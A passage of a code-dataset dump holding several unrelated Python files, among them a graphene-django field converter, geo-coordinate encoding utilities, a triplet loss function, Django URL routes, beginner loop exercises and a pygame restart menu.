only_fields\r\n # is_already_created = name in options.fields\r\n is_excluded = name in exclude_fields # or is_already_created\r\n # https://docs.djangoproject.com/en/1.10/ref/models/fields/#django.db.models.ForeignKey.related_query_name\r\n is_no_backref = str(name).endswith('+')\r\n if is_not_in_only or is_excluded or is_no_backref:\r\n # We skip this field if we specify only_fields and is not\r\n # in there. Or when we exclude this field in exclude_fields.\r\n # Or when there is no back reference.\r\n continue\r\n converted = convert_django_field_with_choices(field, registry, input_flag)\r\n\r\n fields[name] = converted\r\n\r\n return fields\r\n\r\n\r\n@singledispatch\r\ndef convert_django_field(field, registry=None, input_flag=None):\r\n raise Exception(\r\n \"Don't know how to convert the Django field %s (%s)\" %\r\n (field, field.__class__))\r\n\r\n\r\n@convert_django_field.register(models.CharField)\r\n@convert_django_field.register(models.TextField)\r\n@convert_django_field.register(models.EmailField)\r\n@convert_django_field.register(models.SlugField)\r\n@convert_django_field.register(models.URLField)\r\n@convert_django_field.register(models.GenericIPAddressField)\r\n@convert_django_field.register(models.FileField)\r\ndef convert_field_to_string(field, registry=None, input_flag=None):\r\n return String(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.AutoField)\r\ndef convert_field_to_id(field, registry=None, input_flag=None):\r\n if input_flag:\r\n return ID(description=field.help_text or _('Django object unique identification field'),\r\n required=input_flag == 'update')\r\n return ID(description=field.help_text or _('Django object unique identification field'), required=not field.null)\r\n\r\n\r\n@convert_django_field.register(models.UUIDField)\r\ndef convert_field_to_uuid(field, registry=None, input_flag=None):\r\n return UUID(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.PositiveIntegerField)\r\n@convert_django_field.register(models.PositiveSmallIntegerField)\r\n@convert_django_field.register(models.SmallIntegerField)\r\n@convert_django_field.register(models.BigIntegerField)\r\n@convert_django_field.register(models.IntegerField)\r\ndef convert_field_to_int(field, registry=None, input_flag=None):\r\n return Int(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.BooleanField)\r\ndef convert_field_to_boolean(field, registry=None, input_flag=None):\r\n required = is_required(field, input_flag)\r\n if required:\r\n return NonNull(Boolean, description=field.help_text)\r\n return Boolean(description=field.help_text)\r\n\r\n\r\n@convert_django_field.register(models.NullBooleanField)\r\ndef convert_field_to_nullboolean(field, registry=None, input_flag=None):\r\n return Boolean(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.DecimalField)\r\n@convert_django_field.register(models.FloatField)\r\n@convert_django_field.register(models.DurationField)\r\ndef convert_field_to_float(field, registry=None, input_flag=None):\r\n return Float(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.DateField)\r\n@convert_django_field.register(models.DateTimeField)\r\ndef convert_date_to_string(field, registry=None, input_flag=None):\r\n return DateTime(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.TimeField)\r\ndef convert_time_to_string(field, registry=None, input_flag=False):\r\n return Time(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.OneToOneRel)\r\ndef convert_onetoone_field_to_djangomodel(field, registry=None, input_flag=None):\r\n model = field.related_model\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return ID()\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n # We do this for a bug in Django 1.8, where null attr\r\n # is not available in the OneToOneRel instance\r\n # null = getattr(field, 'null', True)\r\n # return Field(_type, required=not null)\r\n\r\n return Field(_type)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(models.ManyToManyField)\r\ndef convert_field_to_list_or_connection(field, registry=None, input_flag=None):\r\n model = get_related_model(field)\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return DjangoListField(ID, required=is_required(field, input_flag))\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n if _type._meta.filter_fields:\r\n return DjangoFilterListField(_type)\r\n # return DjangoFilterPaginateListField(_type, pagination=LimitOffsetGraphqlPagination())\r\n return DjangoListField(_type)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(models.ManyToManyRel)\r\n@convert_django_field.register(models.ManyToOneRel)\r\ndef convert_many_rel_to_djangomodel(field, registry=None, input_flag=None):\r\n model = field.related_model\r\n if isinstance(field, models.ManyToManyRel):\r\n for f in field.related_model._meta.many_to_many:\r\n if f.rel.name == field.name and f.rel.model == field.model:\r\n blank = f.blank\r\n else:\r\n blank = True\r\n\r\n _field = field\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return DjangoListField(ID, required=not blank and input_flag == 'create')\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n if _type._meta.filter_fields:\r\n return DjangoFilterListField(_type)\r\n # return DjangoFilterPaginateListField(_type, pagination=LimitOffsetGraphqlPagination())\r\n return DjangoListField(_type)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(models.OneToOneField)\r\n@convert_django_field.register(models.ForeignKey)\r\ndef convert_field_to_djangomodel(field, registry=None, input_flag=None):\r\n model = get_related_model(field)\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return ID(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n # return Field(_type, description=field.help_text, required=field.null)\r\n return Field(_type, description=field.help_text)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(ArrayField)\r\ndef convert_postgres_array_to_list(field, registry=None, input_flag=None):\r\n base_type = convert_django_field(field.base_field)\r\n if not isinstance(base_type, (List, NonNull)):\r\n base_type = type(base_type)\r\n return List(base_type, description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(HStoreField)\r\n@convert_django_field.register(JSONField)\r\ndef convert_posgres_field_to_string(field, registry=None, input_flag=None):\r\n return JSONString(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(RangeField)\r\ndef convert_posgres_range_to_string(field, registry=None, input_flag=None):\r\n inner_type = convert_django_field(field.base_field)\r\n if not isinstance(inner_type, (List, NonNull)):\r\n inner_type = type(inner_type)\r\n return List(inner_type, description=field.help_text, required=is_required(field, input_flag))\r\n","sub_path":"graphene_django_extras/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":11405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"462398943","text":"from __future__ import unicode_literals\nfrom bisect import bisect_left, bisect_right\n\nimport re\nimport calendar\nfrom decimal import Decimal\nfrom datetime import datetime\n\nfrom django.utils.timezone import utc\n\n\nY2K_TIMESTAMP = 946684800\nTIMESTAMP_MIN_LENGTH = 10\nLATITUDE_MIN_LENGTH = 3\nLONGITUDE_MIN_LENGTH = 4\n\n\ndef encode_number(num):\n encoded = \"\"\n while num >= 0x20:\n encoded += chr((0x20 | (num & 0x1f)) + 63)\n num >>= 5\n encoded += chr(num + 63)\n return encoded\n\n\ndef encode_signed_number(num):\n sgn_num = num << 1\n if num < 0:\n sgn_num = ~sgn_num\n return encode_number(sgn_num)\n\n\ndef decode_number(encoded):\n enc_len = len(encoded)\n ii = 0\n shift = 0\n result = 0\n b = 0x20\n while b >= 0x20 and ii < enc_len:\n b = ord(encoded[ii]) - 63\n ii += 1\n result |= (b & 0x1f) << shift\n shift += 5\n if result & 1:\n return ~(result >> 1), encoded[ii:]\n else:\n return result >> 1, encoded[ii:]\n\n\nclass GeoCoordinates(object):\n repr_re = re.compile(\n r'^(?P^\\-?\\d{1,2}(\\.\\d+)?),'\n r'(?P\\-?1?\\d{1,2}(\\.\\d+)?$)'\n )\n _latitude = None\n _longitude = None\n\n @staticmethod\n def min_length(precision=None, separator=\",\"):\n min_len = LATITUDE_MIN_LENGTH + len(separator) + LONGITUDE_MIN_LENGTH \n if precision is not None and precision > 0:\n return min_len + 2 * (1 + precision)\n return min_len\n\n def __init__(self, *args):\n if len(args) > 2:\n raise TypeError('Too many arguments')\n elif len(args) == 2:\n self.latitude = args[0]\n self.longitude = args[1]\n elif len(args) == 1:\n value = args[0]\n if isinstance(value, basestring):\n match = self.repr_re.match(value)\n if match is None:\n raise ValueError(\"Incorrect argument '{}'\".format(value))\n self.latitude = match.group('latitude')\n self.longitude = match.group('longitude')\n if isinstance(value, (tuple, list)):\n self.latitude = value[0]\n self.longitude = value[1]\n else:\n raise TypeError()\n\n @property\n def latitude(self):\n return self._latitude\n\n @latitude.setter\n def latitude(self, value):\n if isinstance(value, (float, int)):\n value = str(value)\n # Put value in a correct range\n lat_mod = ((Decimal(value) + 90) % 360 + 360) % 360\n lat = 270 - lat_mod if lat_mod >= 180 else lat_mod - 90\n self._latitude = lat\n\n @property\n def longitude(self):\n return self._longitude\n\n @longitude.setter\n def longitude(self, value):\n if isinstance(value, (float, int)):\n value = str(value)\n # Put value in a correct range\n lon = ((Decimal(value) + 180) % 360 + 360) % 360 - 180\n self._longitude = lon\n\n def format_string(self, precision=None, separator=','):\n fmt = \"{0}\"\n if all([precision is not None,\n any([not isinstance(precision, int),\n precision < 0])]):\n TypeError(\"Invalid argument 'precision'.\")\n elif precision is not None:\n fmt = \"%.{0}f\".format(precision)\n return separator.join([fmt.format(self.latitude),\n fmt.format(self.longitude)])\n\n def __str__(self):\n return self.format_string()\n\n def __repr__(self):\n return \"GeoCoordinates(%s)\" % str(self)\n\n def __len__(self):\n return len(str(self))\n\n def __eq__(self, other):\n return (isinstance(other, GeoCoordinates)\n and self.latitude == other.latitude\n and self.longitude == other.longitude)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __cmp__(self, other):\n if not isinstance(other, GeoCoordinates):\n raise TypeError('Can only compare to other instances of '\n 'GeoCoordinates')\n return cmp((self.latitude, self.longitude),\n (other.latitude, other.longitude))\n\n\nclass GeoCoordinatesSeries(list):\n @staticmethod\n def check_instance(item):\n if not isinstance(item, GeoCoordinates):\n raise TypeError('item is not of type GeoCoordinates')\n\n def __init__(self, lst):\n if isinstance(lst, basestring):\n lst = GeoCoordinatesSeries.parse_string(lst)\n for item in lst:\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).__init__(lst)\n\n def __setitem__(self, key, item):\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).__setitem__(key, item)\n\n def __contains__(self, item):\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).__contains__(item)\n\n def append(self, item):\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).append(item)\n\n def __str__(self):\n result = \"\"\n prev_lat = 0\n prev_lng = 0\n for pt in self:\n lat_d = int(round(1e5 * (float(pt.latitude) - prev_lat)))\n lng_d = int(round(1e5 * (float(pt.longitude) - prev_lng)))\n result += encode_signed_number(lat_d) + encode_signed_number(lng_d)\n prev_lat += lat_d / 1e5\n prev_lng += lng_d / 1e5\n return result\n\n @staticmethod\n def parse_string(encoded):\n result = []\n lat = 0\n lon = 0\n while len(encoded) > 0:\n lat_d, encoded = decode_number(encoded)\n lon_d, encoded = decode_number(encoded)\n lat += lat_d\n lon += lon_d\n result.append(GeoCoordinates(lat / 1e5, lon / 1e5))\n return result\n\n\nclass GeoLocation(object):\n\n @staticmethod\n def min_length(timestamp_precision=None, coords_precision=None, separator=\":\", \n coords_separator=\",\"):\n min_len = (TIMESTAMP_MIN_LENGTH + len(separator) +\n GeoCoordinates.min_length(coords_precision,\n coords_separator))\n if timestamp_precision is not None and timestamp_precision > 0:\n return min_len + 1 + timestamp_precision\n return min_len\n\n def __init__(self, timestamp, coordinates):\n self._timestamp = None\n self.timestamp = timestamp\n if isinstance(coordinates, GeoCoordinates):\n self.coordinates = coordinates\n elif isinstance(coordinates, (list, tuple)) and len(coordinates) == 2:\n self.coordinates = GeoCoordinates(coordinates[0], coordinates[1])\n else:\n raise ValueError(\"Wrong parameter 'coordinates', \"\n \"expecting GeoCoordinates or a tuple\")\n\n def get_datetime(self):\n return datetime.fromtimestamp(self._timestamp, utc)\n\n def get_timestamp(self):\n return self._timestamp\n\n def set_timestamp(self, value):\n if isinstance(value, datetime):\n value = str(calendar.timegm(value.timetuple()))\n elif isinstance(value, float) or isinstance(value, int):\n value = str(value)\n timestamp = Decimal(value)\n self._timestamp = timestamp\n\n timestamp = property(get_timestamp, set_timestamp)\n\n def format_string(self, timestamp_precision=None, coords_precision=None, ):\n data = \"%s:%s\" % (self._timestamp, self.coordinates)\n if len(data) <= GeoLocation.min_length():\n return data\n return \"%s:%s\" % ((\"%s\" % self._timestamp)[:17], self.coordinates)\n\n def __str__(self):\n return self.format_string()\n\n def __repr__(self):\n return \"GeoLocation(%s)\" % str(self)\n\n def __len__(self):\n return len(str(self))\n\n def __eq__(self, other):\n return (isinstance(other, GeoLocation)\n and self.coordinates == other.coordinates\n and self.timestamp == other.timestamp)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __cmp__(self, other):\n if not isinstance(other, GeoLocation):\n raise TypeError('Can only compare to other instances of '\n 'GeoLocation')\n return cmp((self.timestamp, self.coordinates),\n (other.timestamp, other.coordinates))\n\n\nclass GeoLocationSeries(object):\n @staticmethod\n def check_instance(item):\n if not isinstance(item, GeoLocation):\n raise TypeError('item is not of type GeoLocation')\n\n def __init__(self, lst=None):\n if lst is None:\n lst = []\n if isinstance(lst, basestring):\n lst = GeoLocationSeries.parse_string(lst)\n decorated = sorted(lst)\n self._keys = [item.timestamp for item in decorated]\n self._items = [item for item in decorated]\n for item in lst:\n self.check_instance(item)\n\n def clear(self):\n self.__init__([])\n\n def copy(self):\n return self.__class__(self)\n\n def __len__(self):\n return len(self._items)\n\n def __getitem__(self, i):\n return self._items[i]\n\n def __iter__(self):\n return iter(self._items)\n\n def __reversed__(self):\n return reversed(self._items)\n\n def __repr__(self):\n return '%s(%r)' % (\n self.__class__.__name__,\n self._items\n )\n\n def __reduce__(self):\n return self.__class__, self._items\n\n def __contains__(self, item):\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n j = bisect_right(self._keys, k)\n return item in self._items[i:j]\n\n def index(self, item):\n \"\"\"Find the position of an item. Raise ValueError if not found.\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n j = bisect_right(self._keys, k)\n return self._items[i:j].index(item) + i\n\n def count(self, item):\n \"\"\"Return number of occurrences of item\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n j = bisect_right(self._keys, k)\n return self._items[i:j].count(item)\n\n def insert(self, item):\n \"\"\"Insert a new item. If equal keys are found, replace item\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n if i < len(self._keys) and self._keys[i] == k:\n self._items[i] = item\n else:\n self._keys.insert(i, k)\n self._items.insert(i, item)\n\n def insert_right(self, item):\n \"\"\"Insert a new item. If equal keys are found, add to the right\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_right(self._keys, k)\n self._keys.insert(i, k)\n self._items.insert(i, item)\n\n def remove(self, item):\n \"\"\"Remove first occurence of item. Raise ValueError if not found\"\"\"\n self.check_instance(item)\n i = self.index(item)\n del self._keys[i]\n del self._items[i]\n\n def find(self, k):\n \"\"\"Return first item with a key == k.\n Raise ValueError if not found.\"\"\"\n i = bisect_left(self._keys, k)\n if i != len(self) and self._keys[i] == k:\n return self._items[i]\n raise ValueError('No item found with key equal to: %r' % (k,))\n\n def find_lte(self, k):\n \"\"\"Return last item with a key <= k. Raise ValueError if not found.\"\"\"\n i = bisect_right(self._keys, k)\n if i:\n return self._items[i - 1]\n raise ValueError('No item found with key at or below: %r' % (k,))\n\n def find_lt(self, k):\n \"\"\"Return last item with a key < k. Raise ValueError if not found.\"\"\"\n i = bisect_left(self._keys, k)\n if i:\n return self._items[i - 1]\n raise ValueError('No item found with key below: %r' % (k,))\n\n def find_gte(self, k):\n \"\"\"Return first item with a key >= equal to k.\n Raise ValueError if not found\"\"\"\n i = bisect_left(self._keys, k)\n if i != len(self):\n return self._items[i]\n raise ValueError('No item found with key at or above: %r' % (k,))\n\n def find_gt(self, k):\n \"\"\"Return first item with a key > k. Raise ValueError if not found\"\"\"\n i = bisect_right(self._keys, k)\n if i != len(self):\n return self._items[i]\n raise ValueError('No item found with key above: %r' % (k,))\n\n def __str__(self):\n result = \"\"\n prev_tim = Y2K_TIMESTAMP\n prev_lat = 0\n prev_lng = 0\n for pt in self:\n coord = pt.coordinates\n tim_d = int(round(float(pt.timestamp) - prev_tim))\n lat_d = int(round(1e5 * (float(coord.latitude) - prev_lat)))\n lng_d = int(round(1e5 * (float(coord.longitude) - prev_lng)))\n result += (encode_signed_number(tim_d)\n + encode_signed_number(lat_d)\n + encode_signed_number(lng_d))\n prev_tim += tim_d\n prev_lat += lat_d / 1e5\n prev_lng += lng_d / 1e5\n return result\n\n @staticmethod\n def parse_string(encoded):\n result = []\n tim = Y2K_TIMESTAMP\n lat = 0\n lon = 0\n while len(encoded) > 0:\n tim_d, encoded = decode_number(encoded)\n lat_d, encoded = decode_number(encoded)\n lon_d, encoded = decode_number(encoded)\n tim += tim_d\n lat += lat_d\n lon += lon_d\n result.append(GeoLocation(tim, (lat / 1e5, lon / 1e5)))\n return result\n\n def __eq__(self, other):\n return isinstance(other, GeoLocationSeries) \\\n and self._items == other._items\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def union(self, other):\n out = self.copy()\n for item in other._items:\n out.insert(item)\n return out\n","sub_path":"globetrotting/utils/geo_objects.py","file_name":"geo_objects.py","file_ext":"py","file_size_in_byte":14038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"604697903","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n FileName [ tri_loss.py ]\r\n PackageName [ final ]\r\n Synopsis [ Self defined triplet loss loading methods. ]\r\n\r\n Example:\r\n python3.7 preprocess_features.py --dataroot ./IMDb_resize/\r\n\"\"\"\r\nimport torch\r\nimport torch.nn as nn\r\n\r\ndef triplet_loss(inputs, labels: list, cast_num: int, triplet_criterion, norm_criterion=None):\r\n \"\"\"\r\n Self define triplet loss function.\r\n\r\n Params:\r\n - inputs: Tensor _(num_cast + num_cand) x 2048\r\n - labels: List _(num_cast + num_cand) x 1\r\n - cast_num: int _ number of casts\r\n\r\n Description:\r\n - x_a: The candidates' images\r\n - x_p: The casts' images\r\n - x_n: The candidates' images\r\n\r\n Return:\r\n - loss\r\n \"\"\"\r\n\r\n batchsize = inputs.shape[0]\r\n candidate_num = batchsize - cast_num\r\n\r\n inputs = inputs.reshape(batchsize, -1)\r\n\r\n x_a, x_p = inputs[cast_num:], inputs[:cast_num]\r\n\r\n labels = torch.LongTensor(labels)\r\n\r\n index_a = labels[cast_num:]\r\n index_n = torch.randint(0, cast_num, size=(candidate_num, ))\r\n\r\n # If index_n is equal to index_a, random again.\r\n while (index_n == index_a).nonzero().shape[0] > 0:\r\n n = (index_n == index_a).nonzero().numel()\r\n index_n[index_n == index_a] = torch.randint(0, cast_num, size=(n, ))\r\n\r\n # Make the P/N Pairs with index_p and index_n\r\n # print(\"index_n :\", index_n)\r\n # print(\"index_p :\", index_p)\r\n # print(\"x_p.shape ;\", x_p.shape)\r\n # print()\r\n x_p, x_n = x_p[index_a], x_p[index_n]\r\n\r\n if norm_criterion is not None:\r\n loss = triplet_criterion(x_a, x_p, x_n) + norm_criterion(x_a) + norm_criterion(x_n)\r\n return loss\r\n \r\n loss = triplet_criterion(x_a, x_p, x_n)\r\n return loss\r\n","sub_path":"tri_loss.py","file_name":"tri_loss.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"462532911","text":"import os\n\n## Computational function\ndef task_id(i):\n host = host = os.popen(\"hostname\").read()[:-1]\n ps = os.popen(\"cat /proc/self/stat | awk '{print $39}'\").read()[:-1]\n return \"Task ID: %s, Hostanem: %s, CPU ID: %s\" % (i, host, ps)\n\n## Iterate to run the computational function\nfor t in [int(os.getenv('SLURM_ARRAY_TASK_ID'))]:\n print(task_id(t))\n","sub_path":"analysis/array-test.py","file_name":"array-test.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"406969942","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # Old busted\n url(r'^create_old/$',\n views.create_adj_allocation,\n name='create_adj_allocation'),\n url(r'^edit_old/$',\n views.draw_adjudicators_edit,\n name='draw_adjudicators_edit'),\n url(r'^_get_old/$',\n views.draw_adjudicators_get,\n name='draw_adjudicators_get'),\n url(r'^_update_importance/$',\n views.update_debate_importance,\n name='update_debate_importance'),\n url(r'^conflicts_old/$',\n views.adj_conflicts,\n name='adj_conflicts'),\n url(r'^save/$',\n views.SaveAdjudicatorsView.as_view(),\n name='save_adjudicators'),\n # New Hotness\n url(r'^edit/$',\n views.EditAdjudicatorAllocationView.as_view(),\n name='edit_adj_allocation'),\n url(r'^create/$',\n views.CreateAutoAllocation.as_view(),\n name='create_auto_allocation'),\n url(r'^importance/set/$',\n views.SaveDebateImportance.as_view(),\n name='save_debate_importance'),\n url(r'^panel/set/$',\n views.SaveDebatePanel.as_view(),\n name='save_debate_panel'),\n]\n","sub_path":"tabbycat/adjallocation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"249060158","text":"# while循环\n\n# n = 1\n# while n < 50:\n# \tprint('当前n的值为: %s'%n)\n# \tn+=2\n\n\n#for循环字符串\n\n# list = ['a','b','c']\n# for f in list:\n# \tprint('当前的值为:%s'%f)\n\n# for循环数字\n\n# num =[1,2,3]\n# for x in num:\n# \tprint('当前数字为:%s'%x)\n\n\n\n# for循环字典\n# zidian = {'name':'阳','age':'22'}\n# for x in zidian:\n# \tprint('当前n的值为:%s:%s'%(x,zidian[x]))\n\n# 循环遍历字典:简洁方式(在for循环中可以使用序列解包)\n\n# zidian = {'name':'阳','age':'22'}\n# for key,value in zidian.items():\n# \tprint('%s:%s'%(key,value))\n\n\nstudent = ['张三','李四','王五','马六']\nnumber = ['1001','1002','1003','1004']\n\n# 并行迭代\n\n# range,i是索引\n# for i in range(len(student)):\n\t# print(student[i],'的学号是: ',number[i])\n\n# Python 内置zip函数\n\n# for name,num in zip(student,number):\n# \tprint(name,'的学号是',num) #结果与上面的一样\n\n# zip函数可以作用于任意数量的序列,可以应付不等长的序列,当短序用完时程序就会停止\n# for num1,num2 in zip(range(3),range(100)):\n# \tprint('zip的值为:',num1,num2)\n\n\n# 翻转和排序迭代\n#sorted() 排序方法 返回一个列表\n# sorted([6,4,7,1]) \n# >>> [1,4,6,7]\n\n# sorted('v5solle')\n# >>> ['5', 'e', 'l', 'l', 'o', 's', 'v']\n\n\n# 跳出循环\n\n# num = 10\n# while num > 0:\n# \tprint('当前num的值为:',num)\n# \tnum -=1\n# \tif num == 8:\n# \t\tbreak\n\n\n\n# 循环中的else语句\n\n# while\n# num = 0\n# while num < 4:\n# \tprint(num,'小于四')\n# \tnum = num+1\n# else:\n# \tprint('当前num的值大于四了')\n\n# for循环\n\n# name = ['小明','小智']\n# for x in name:\n# \tif x == '小红':\n# \t\tprint('名称',x)\n# \t\tbreak\n# else:\n# \tprint('米有玄幻到')\n\n\n# pass语句: 空语句 不做任何事情 只是为了程序的结构占位\n\n# name = ['小明','小红']\n\n# for i in name:\n# \tif i == '小明':\n# \t\tprint(i)\n# \telif i == '小红':\n# \t\t# print(i) 这里不能为空,为空的话会报错,这里使用pass语句\n# \t\tpass\n# \telse:\n# \t\tprint('什么都没偶')\n\n\n\n### 猜数字游戏\n\n\n# import random\n\n# number = random.randint(1,100)\n\n# index = 0\n# while True:\n# \tvalue = input('请输入1-100之间的一个数字')\n# \tindex+=1\n# \tif not value.isdigit():\n# \t\tprint('必须输入数字')\n# \telif int(value) < 0 or int(value) > 100:\n# \t\tprint('输入的数字必须在1-100之间')\n# \telif number == int(value):\n# \t\tprint('恭喜你答对了,你一共输入了%s次,真是个大笨蛋哦'%index)\n# \telif number < int(value):\n# \t\tprint('你输入的值太大了')\n# \telif number > int(value):\n# \t\tprint('你输入的值太小了')\n# \telse: \n# \t\tprint('程序出错了')\n\n\n### 九九乘法表\nfor i in range (1,10):\n for j in range(1,10):\n print(j,\"x\",i,\"=\",i*j,\"\\t\",end=\"\")\n if i==j:\n print(\"\")\n # break\n\n\n\n\n# name = 'xiao'\n# if name == 'xiao':\n# \tprint('小')\n# elif name == 'da':\n# \tprint('大')\n# \tpass\n# else:\n# \tprint('错误')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python3.5从零开始/Code/01循环和迭代工具.py","file_name":"01循环和迭代工具.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"281628102","text":"import numpy\r\nimport matplotlib.pyplot as plt\r\n\r\na = numpy.arange(40,50)\r\nb = numpy.arange(50,60)\r\nplt.title(\"Simple Line Plot\")\r\nplt.xlabel(\"X-Axis\")\r\nplt.ylabel(\"Y-Axis\")\r\nplt.plot(a, b)\r\nplt.show()","sub_path":"Day1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"93803280","text":"\"\"\"\r\nQuestion 19 :\r\n You are required to write a program to sort the (name, age, height)\r\n tuple by ascending order where name is string, age and height are\r\n numbers. The tuple are input by console. The sort criteria is\r\n 1 : Sort based on name; 2 : Then sort based on age;\r\n 3 : Then sort by score. The priority is that name->age->score.\r\n If the following tuples are given as input to the program:\r\n Tom,19,80 John,20,90 Jony,17,91 Jony,17,93 Json,21,85 Then,\r\n the output of the program should be : [('Jonh', '20', '90'),\r\n ('Jony', '17', '91'),('Jony', '17', '93'), ('Json', '21', '85'), ('Tom', '19', '60')]\r\n\r\n Hints : In case of input data being supplied to the question,\r\n it should be assumed to be a console input. We use itemgetter\r\n to enable multiple sort keys.\r\n\"\"\"\r\n\r\n# Solution : from operator import itemgetter, attrgetter\r\n\r\nfrom operator import *\r\n\r\n# OR\r\n\r\n# from operator import itemgetter, attrgetter\r\n\r\nl = []\r\nwhile True:\r\n sen = input(\"Enter a name age and score : \")\r\n if not sen:\r\n break\r\n l.append(tuple(sen.split(\",\")))\r\n\r\nprint(sorted(l, key=itemgetter(0, 1, 2)))\r\n\r\n\"\"\"\r\nOutput : \r\n Enter a name age and score : Tom,19,80\r\n Enter a name age and score : John,20,90\r\n Enter a name age and score : Jony,17,91\r\n Enter a name age and score : Jony,17,93\r\n Enter a name age and score : Json,21,85\r\n Enter a name age and score : \r\n [('John', '20', '90'), ('Jony', '17', '91'), ('Jony', '17', '93'), ('Json', '21', '85'), ('Tom', '19', '80')]\r\n\"\"\"\r\n","sub_path":"Question-19.py","file_name":"Question-19.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"285898815","text":"import pygame\n\npygame.init()\n\ndisplay_width = 900\ndisplay_heigh = 1200\n\nwindow = pygame.display.set_mode((display_width, display_heigh))\n\npygame.display.set_caption('KittyMama')\n\nclock = pygame.time.Clock()\n\ngameDisplay = pygame.Surface((display_width, display_heigh))\nsurface = pygame.image.load(\"1.jpg\")\nwindow.blit(surface, (0, 0))\npygame.display.flip()\n\nmyfont = pygame.font.SysFont(\"comicsansms\", 16)\nscore = 0\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, [255, 255, 255])\n return textSurface, textSurface.get_rect()\n\n\ndef button (msg, x, y, w, h, ic, ac, action=None ):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if (x+w > mouse[0] > x) and (y+h > mouse[1] > y):\n pygame.draw.rect(window, (0,0,0), (x, y, w, h))\n if (click[0] == 1 and action != None):\n if (action == \"Start\"):\n import Game\n Game.game_loop()\n elif (action == \"Exit\"):\n pygame.quit()\n else:\n pygame.draw.rect(window, (0,0,0), (x, y, w, h))\n smallText = pygame.font.SysFont(\"comicsansms\", 50)\n textSurf, textRect = text_objects(msg, smallText)\n textRect.center = ( (x+(w/2)), (y+(h/2)) )\n window.blit(textSurf, textRect)\n\ndone = True\nwhile done:\n window.blit(surface, (0, 0))\n\n scoretext = myfont.render(\"Your score {0}\".format(score), 1, (0, 0, 0))\n window.blit(scoretext, (5, 10))\n score += 1\n\n button(\"Restart\", 600, 120, 120, 25, (255, 255, 255),(0, 0, 0), \"Start\")\n button(\"Exit\", 600, 620, 120, 25, (0, 0, 0), (255, 255, 255), \"Exit\")\n pygame.display.update()\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n done = False\n\n\n clock.tick(40)\npygame.quit()\nquit()\n\n","sub_path":"RestartMenu.py","file_name":"RestartMenu.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
